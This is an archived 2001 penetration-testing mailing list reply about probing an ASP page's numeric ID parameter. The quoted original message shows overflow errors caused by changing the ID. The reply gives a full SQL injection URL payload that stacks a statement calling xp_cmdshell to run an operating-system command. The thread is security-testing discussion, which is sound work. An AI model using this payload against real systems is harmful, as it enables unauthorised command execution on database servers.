Penetration Testing mailing list archives

Re: ASP code testing

From: "rudi carell" <rudicarell () hotmail com>
Date: Mon, 19 Nov 2001 08:11:52



hi dan,

if the application(not the DB!) does not check for a valid number(int) ,
i d recommand appending a second statement something like:

---cut here---

http://server/showsomething.asp?
ID=5['|"|<nothing>];exec+master%2e%2exp_cmdshell+%22dir+c:\%22;--%00

---cut here---

if not, go for the next input field ...


rc

http://www.asite.com/show/showsomething.asp?ID=5
Will retrieve a legitmate item from the database. By playing with the
number a bit- http://www.asite.com/show/showsomething.asp?ID=32767

Will generate

ADODB.Field error '80020009'

Either BOF or EOF is True, or the current record has been deleted.
Requested operation requires a current record.

But if I bump that number up to 32768 (unsigned integer limit)-

Microsoft VBScript runtime error '800a0006'

Overflow: 'cint'




rc

security () freefly com
http://www.freefly.com/security/














_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Current thread:

ASP code testing Dan Richardson (Nov 18)
- Re: ASP code testing Bojo (Nov 19)
- Re: ASP code testing Kevin Spett (Nov 19)
- RE: ASP code testing Omar Koudsi (Nov 19)
- <Possible follow-ups>
- Re: ASP code testing rudi carell (Nov 19)